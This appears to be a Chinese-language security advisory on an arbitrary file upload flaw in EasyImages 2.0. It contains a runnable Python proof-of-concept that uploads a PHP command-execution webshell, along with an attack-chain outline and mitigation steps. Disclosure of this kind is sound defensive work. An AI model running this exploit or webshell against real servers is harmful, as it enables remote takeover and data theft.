CVE-2025-65471 EasyImages 2.0 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-65471

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

EasyImages 2.0

漏洞概述

EasyImages 2.0 v2.8.6及以下版本中存在一处严重的任意文件上传漏洞。该漏洞位于/admin/manager.php组件中，允许攻击者通过上传精心构造的PHP文件来实现任意代码执行。由于该漏洞的CVSS评分高达8.8，属于高危漏洞，对系统安全性造成严重威胁。攻击者无需高级权限即可利用此漏洞，成功利用后可完全控制受影响的服务器，窃取敏感数据、植入后门或进行横向移动。此漏洞影响所有使用EasyImages图床系统的用户，尤其是那些开放管理后台访问的部署环境。

技术细节

该漏洞源于/admin/manager.php组件对上传文件的验证不充分。攻击者可以绕过常规的文件类型检查，上传包含恶意PHP代码的文件（如webshell.php）。上传成功后，攻击者通过直接访问上传的文件路径即可在服务器上执行任意PHP代码。CVSS向量显示攻击复杂度低（AC:L），且只需要低权限（PR:L），无需用户交互（UI:N）。攻击成功后，攻击者获得完整的机密性（C:H）、完整性（I:H）和可用性（A:H）影响。由于是网络远程攻击（AV:N），攻击者可从互联网发起攻击。建议立即升级到EasyImages最新版本，并在管理后台实施严格的文件上传验证机制，包括文件类型白名单、文件内容检测和文件大小限制。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的/admin/manager.php管理接口

STEP 2

步骤2

构造包含恶意PHP代码的文件（如webshell.php），绕过文件类型检查进行上传

STEP 3

步骤3

文件上传成功后，攻击者获取上传文件的访问路径

STEP 4

步骤4

通过HTTP请求访问上传的PHP文件，触发恶意代码执行

STEP 5

步骤5

成功执行任意命令，获得服务器完全控制权，可进行数据窃取、植入后门等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-65471 PoC - EasyImages 2.0 Arbitrary File Upload
# Target: EasyImages <= 2.8.6
# Component: /admin/manager.php

def exploit(target_url, webshell_content):
    """
    Exploit arbitrary file upload vulnerability in EasyImages 2.0
    Upload a malicious PHP file to achieve RCE
    """
    upload_url = f"{target_url.rstrip('/')}/admin/manager.php"
    
    # Prepare the malicious PHP file
    files = {
        'file': ('shell.php', webshell_content, 'image/php')
    }
    
    # Additional fields that might be required
    data = {
        'action': 'upload',
        'dir': '/'
    }
    
    try:
        response = requests.post(upload_url, files=files, data=data, timeout=10)
        
        # Check if upload was successful
        if response.status_code == 200:
            print(f"[+] File uploaded successfully!")
            print(f"[+] Response: {response.text}")
            
            # Try to access the uploaded shell
            shell_path = f"{target_url.rstrip('/')}/uploads/shell.php"
            shell_check = requests.get(shell_path, timeout=10)
            
            if shell_check.status_code == 200:
                print(f"[+] Webshell accessible at: {shell_path}")
                return True
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/easyimages")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Simple webshell for demonstration
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    exploit(target, webshell)

影响范围

EasyImages 2.0 <= 2.8.6

防御指南

临时缓解措施

立即限制/admin/manager.php的访问权限，配置Web服务器禁止执行/uploads目录下的PHP文件，临时关闭文件上传功能，等待官方发布安全更新后升级到最新版本。